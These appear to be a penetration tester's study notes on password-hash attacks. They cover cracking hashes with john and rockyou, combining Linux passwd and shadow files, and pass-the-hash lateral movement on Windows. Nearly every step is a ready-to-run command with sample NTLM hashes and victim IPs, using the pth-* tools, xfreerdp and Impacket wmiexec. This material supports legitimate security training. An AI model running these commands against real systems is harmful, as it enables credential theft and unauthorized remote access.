Password hash attack

Goals

• To crack obtained password hash

1. Identify hash type

• In Kali, hash-identifier
• Then key in hash

2. Crack the hash dump

Don't have root/SYSTEM privilege yet. Already have hash of password via LFI or RFI.

2.1 Crach any hash (with known hash type)

• Already known hash type in step 1.
• Sample john for various hash: http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
• Backup link: https://github.com/lethanhtung01011980/Notes/wiki/john
• john --fork=25 --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 10.10.10.11.hash

Need to put a * in front of hash for mysql-sha1?

• john --fork=25 --wordlist=/usr/share/wordlists/rockyou.txt --format=mysql-sha1 10.10.10.11.hash

2.2 Crack Windows hash dump

Need to get hash dump from pwdump and fgdump

• pwdump from Windows: john 127.0.0.1.pwdump
• Use with wordlist: john --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump
• Use with wordlist + mutation: john --rules --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump

2.3 Crack Linux shadow hash

Have the content of /etc/passwd and /etc/shadow in password.txt and shadow.txt

• Should be MD5 ($1 in /etc/shadow)

• unshadow 141-password.txt 141-shadow.txt > 141-unshadow.txt

• john --rules --wordlist=/usr/share/wordlists/rockyou.txt 141-unshadow.txt

• 25 nodes: john --rules --fork=25 --wordlist=/usr/share/wordlists/rockyou.txt 141-unshadow.txt

2.4 Crack hash online

• https://crackstation.net/
• https://hashtoolkit.com/decrypt-hash/

3. Passing the hash in Windows

NTLM/LM password hashes are not salted and remain static between sessions and copmuters

• We copy the local administrator NTLM hash of hacked machine
• Use this discovered hash with a patched pth-winexe to gain a shell on a different machine
• which has the same local administrator / password combination.
• /usr/bin/pth-winexe

pth in Kali

• Ref: https://www.hacklikeapornstar.com/all-pth-techniques/
• /usr/bin/pth*
• pth-net: executes net commands (net user, net share) on remote hosts
• pth-rpcclient: opens an interactive session to execute RPC commands
• pth-smbclient: browses available shares on remote computers
• pth-winexe: executes interactively a command on remote computers
• pth-wmic: executes WMI queries on remote computers
• pth-wmis: executes a command using WMI on remote computers

3.1 Using pth

RCE in cmd.exe

• pth-winexe -U WORKGROUP/Administrator%hash:hash //victim-ip cmd.exe
• Example: pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe

Other examples

• pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "select Name from Win32_UserAccount"
• pth-wims -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "cmd.exe /c whoami > c:\temp\result.txt"
• pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25/c$
• pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25

Remote desktop using hash For Windows 2012 R2 and Windows 8.1 victim

• apt-get update
• apt-get install freerdp-x11
• xfreerdp /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.1.25

3.2 Using Impacket

Already installed in Kali

• If port SMB 445 is open.
• wmiexec.py -hashes hash1:hash2 administrator@victim-ip
• Without LM is still working: wmiexec.py -hashes :XXXXX7A37513BXXXX08952XXXX522B administrator@victim-ip